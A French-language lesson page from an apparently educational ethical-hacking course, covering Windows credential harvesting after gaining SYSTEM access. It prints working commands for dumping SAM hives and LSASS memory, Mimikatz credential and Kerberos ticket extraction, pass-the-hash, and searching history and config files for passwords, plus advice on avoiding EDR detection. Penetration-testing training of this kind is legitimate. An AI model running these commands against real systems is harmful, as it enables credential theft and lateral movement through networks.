Collecte d’identifiants
Extraire les secrets
Collecte d’identifiants est une leçon Ethical Hacking Academy gratuite sur CoddyKit. Ceci est la leçon 4 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Ethical Hacking Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Ethical Hacking Academy comprend 4 leçons au total.
Pourquoi collecter des identifiants ?
Même après avoir obtenu SYSTEM, le véritable objectif est souvent constitué des identifiants — condensats de mots de passe, mots de passe en clair et tickets qui permettent de se déplacer latéralement et d’atteindre le domaine. La collecte d’identifiants transforme une seule machine en accès à tout le réseau.
La base de données SAM
Les condensats des comptes locaux se trouvent dans la ruche de registre SAM, chiffrée avec une clé située dans la ruche SYSTEM. Avec un accès SYSTEM, vous pouvez vider les deux ruches et extraire les condensats NTLM hors ligne.
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCALMémoire de LSASS
Le processus LSASS conserve en mémoire les identifiants des utilisateurs connectés — notamment, souvent, des mots de passe en clair ou des condensats NTLM réutilisables ainsi que des tickets Kerberos. Vider LSASS est l’action de collecte qui offre le plus de valeur.
rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp fullMimikatz
Mimikatz est l’outil emblématique d’extraction d’identifiants. sekurlsa::logonpasswords extrait les identifiants de LSASS ; il peut également extraire des tickets, effectuer une authentification par transmission de condensat et vider la SAM.
privilege::debug
sekurlsa::logonpasswords
lsadump::samAuthentification par transmission de condensat
Il n’est souvent pas nécessaire de casser un condensat — l’authentification par transmission de condensat utilise directement le condensat NTLM. C’est pourquoi vider les condensats suffit pour se déplacer latéralement entre des machines qui partagent des identifiants d’administrateur local.
pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>Identifiants de domaine mis en cache
Les machines jointes à un domaine mettent en cache les dernières connexions (MSCache/DCC2) afin que les utilisateurs puissent se connecter hors ligne. Ces condensats mis en cache peuvent être vidés puis cassés hors ligne (lentement), ce qui permet d’obtenir des mots de passe de domaine.
secretsdump.py -system system.save -security security.save LOCALIdentifiants enregistrés et stockés
Windows stocke les identifiants dans le Gestionnaire d’identifiants / Coffre ainsi que dans des objets protégés par DPAPI (connexions RDP enregistrées, mots de passe de navigateur et du Wi-Fi). Avec SYSTEM et les clés principales, vous pouvez les déchiffrer.
cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>Vol de tickets Kerberos
Dans Active Directory, la commande sekurlsa::tickets de Mimikatz exporte les TGT/TGS Kerberos. Les tickets volés permettent l’authentification par transmission de ticket, et un TGT d’administrateur de domaine peut mener à une persistance par Golden/Silver Ticket.
sekurlsa::tickets /exportFichiers et scripts contenant des secrets
Ne négligez pas les gains faciles : les scripts, les fichiers de configuration et l’historique regorgent souvent d’identifiants en clair. L’historique PowerShell, les fichiers d’installation sans assistance et les chaînes de connexion IIS web.config contiennent fréquemment des mots de passe.
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.configNettoyage et OPSEC
Le vidage de LSASS est étroitement surveillé par EDR et Defender Credential Guard peut le bloquer. Lors des interventions, privilégiez les méthodes discrètes, supprimez les fichiers de vidage et documentez les éléments auxquels vous avez accédé pour le rapport.
Éthique et autorisation
La collecte d’identifiants expose les secrets les plus sensibles de l’organisation. Traitez les identifiants vidés de manière sécurisée, n’exfiltrez jamais de données au-delà du périmètre autorisé et n’intervenez qu’avec une autorisation écrite explicite.
Vérification rapide
Testez vos connaissances sur la collecte d’identifiants.
Récapitulatif
Vous avez appris la collecte d’identifiants :
- Videz la SAM pour obtenir les condensats locaux ; videz LSASS pour obtenir ceux des utilisateurs connectés et les tickets
- Mimikatz extrait les mots de passe, les condensats et les tickets Kerberos
- L’authentification par transmission de condensat / l’authentification par transmission de ticket permettent le déplacement latéral sans casser les condensats
- Vérifiez le Gestionnaire d’identifiants, DPAPI et les fichiers de configuration et d’historique à la recherche de secrets
Le cours sur l’élévation de privilèges Windows est maintenant terminé.
Questions Fréquemment Posées
La leçon « Collecte d’identifiants » est-elle gratuite ?
Oui — le texte complet de « Collecte d’identifiants » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Ethical Hacking Academy, passe à CoddyKit PRO. Le cours Ethical Hacking Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Collecte d’identifiants » ?
Extraire les secrets Tu pratiques Ethical Hacking Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Ethical Hacking Academy ?
Aucune expérience préalable n'est requise. Ethical Hacking Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 4 sur 4.
Combien de temps prend la leçon « Collecte d’identifiants » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Ethical Hacking Academy ?
Oui. Chaque leçon Ethical Hacking Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Énumération Windows
- Mauvaises configurations des services
- Usurpation de jeton
- Collecte d’identifiants